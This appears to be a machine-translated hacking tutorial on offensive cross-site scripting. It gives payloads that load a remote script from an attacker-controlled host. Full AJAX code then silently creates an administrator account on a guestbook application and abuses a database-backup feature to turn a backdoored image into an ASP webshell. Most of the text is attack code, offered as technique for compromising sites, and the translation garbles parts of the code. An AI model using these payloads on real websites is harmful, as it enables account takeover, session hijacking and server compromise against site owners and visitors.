Advanced use of xss

Author: cnryan @ http://hi.baidu.com/cnryan

In the past, most of the use of XSS was intended for Trojans, phishing, and cookie piracy. These methods did not really play the role of XSS, because few people can understand the essence of XSS and session hijacking, with browser hijacking, XSS is far beyond our imagination.


1. Permission escalation in XSS
With the application of AJAX technology in many large SNS websites, XSS has become increasingly popular. Using AJAX in XSS scenarios can play its role more effectively.
XSS is the easiest place for user input, such as comments and comments. I set up an sdbook Message Base because sdbook does not properly filter user input variables, this causes the generation of an XSS instance.
The message is first passed to the Administrator as javascript hijacking, so that we can use the Administrator's permissions to do anything, such as adding an administrator.

Enter the cross-site code in the message content:
<Script> s = document. createElement ("script"); s. src = "http://www.xss.com/xss.js"; document. getElementsByTagName ("head") [0]. appendChild (s); </script>

This code is used to load remote JS. The content of xss. js is to use the xmlHttp object to send an asynchronous request and submit it to the server without refreshing XMLHTTP, simulating adding an administrator.


First, use Firebug to monitor network transmission, mainly to obtain post data when admin is added.

Then construct the ajax code
Xss. js code:


Var request = false;
If (window. XMLHttpRequest ){
Request = new XMLHttpRequest ();
If (request. overrideMimeType ){
Request. overrideMimeType (text/xml );
}
} Else if (window. ActiveXObject ){
Var versions = [Microsoft. XMLHTTP, MSXML. XMLHTTP, Microsoft. XMLHTTP, Msxml2.XMLHTTP. 7.0, Msxml2.XMLHTTP. 6.0, Msxml2.XMLHTTP. 5.0, Msxml2.XMLHTTP. 4.0, MSXML2.XMLHTTP. 3.0, MSXML2.XMLHTTP];
For (var I = 0; I <versions. length; I ++ ){
Try {
Request = new ActiveXObject (versions [I]);
} Catch (e ){}
}
}
Xmlhttp = request;

Add_admin ();
Function add_admin (){
Var url = "/sdbook/admin/AdminUser/adminUser_Add.asp ";
Var params = "UserName = cnryan & password1 = 123456 & password2 = 123456 Purview = % B9 % DC % C0 % ED % D4 % B1 & Submit = % CC % E1 % BD % BB ";
Xmlhttp. open ("POST", url, true );
Xmlhttp. setRequestHeader ("Content-type", "application/x-www-form-urlencoded ");
Xmlhttp. setRequestHeader ("Content-length", params. length );
Xmlhttp. setRequestHeader ("Connection", "close ");
Xmlhttp. send (params );
}

When the admin checks the message with XSS, it will quietly add an administrator in the background, the account is cnryan, the password is 123456, and finally we can get the highest permissions for the entire Website user.

Next, let's take a look at this message book scenario. At first, only the admin can view the message, and only the admin can receive the XSS message. When the content passes the review, it is published to the website, at this time, all web browsing users may be subject to XSS, and we can get more session hijacking. Using these sessions may even initiate xss dos attacks on the server.





2. Obtain webshell through XSS

Why AJAX is used? First, it is confidential, that is, the so-called "no refreshing". Second, it can process complex and variable data more effectively and quickly.

Do you have a different idea about the process and code of the above example?
Let's take down the webshell of the website.

There are two necessary conditions: the former must have shell functions in its background, such as backing up the database and inserting data into the configuration information, the latter is because we need to know such information as the website path and default database. Many websites have these defects.

Take webshell as an example to back up the database. This site has the permission to upload an avatar and record our address: UploadFace20090901.jpg. The image is written with a backdoor. Then, POST data is recorded in the testing environment of the white box, construct AJAX code to Write Remote JS Code, and implant JS in the XSS point of the site.

The Code is as follows:

Var request = false;
If (window. XMLHttpRequest ){
Request = new XMLHttpRequest ();
If (request. overrideMimeType ){
Request. overrideMimeType (text/xml );
}
} Else if (window. ActiveXObject ){
Var versions = [Microsoft. XMLHTTP, MSXML. XMLHTTP, Microsoft. XMLHTTP, Msxml2.XMLHTTP. 7.0, Msxml2.XMLHTTP. 6.0, Msxml2.XMLHTTP. 5.0, Msxml2.XMLHTTP. 4.0, MSXML2.XMLHTTP. 3.0, MSXML2.XMLHTTP];
For (var I = 0; I <versions. length; I ++ ){
Try {
Request = new ActiveXObject (versions [I]);
} Catch (e ){}
}
}
Xmlhttp = request;

Getshell ();
Function getshell (){
Var postStr = "dbpathuplouploadface%5c20090901.jpg & bkfolder = Databackup & bkDBname = shell. asp ";
Xmlhttp. open ("POST", "/ADMIN_data.asp? Action = BackupData & act = Backup ", true );
Xmlhttp. setRequestHeader ("Content-type", "application/x-www-form-urlencoded ");
Xmlhttp. setRequestHeader ("Content-length", postStr. length );
Xmlhttp. setRequestHeader ("Connection", "close ");
Xmlhttp. send (postStr );
}

The above code is written by an open-source program I tested. Different programs are different, but generally similar.
The getshell(upload folder copies uploadface20090901.jpg to shell. asp under the Databackup directory.

The premise is that the website has XSS and can successfully inject the constructed code to the background. As long as the administrator inadvertently triggers this xss Trap, we can get webshell.



3. Open-source Xss Hacking

The above examples are all tested in a white box environment. Many problems are based on theory. It is difficult to use XSS penetration in a real environment, but there are still some solutions, the core of XSS is its flexibility and variety, which is also why it is highly sought after. For XSS penetration, you can refer to jianxin's article.

The XSS craze has reached. I believe that penetration engineers and cross-site teachers will surely exert their XSS power to the extreme.



Related information:
Http://www.80sec.com/xss-how-to-root.html

Http://www.80sec.com/browser-hijacking.html

Http://hi.baidu.com/aullik5/blog/item/6947261e7eaeaac0a7866913.html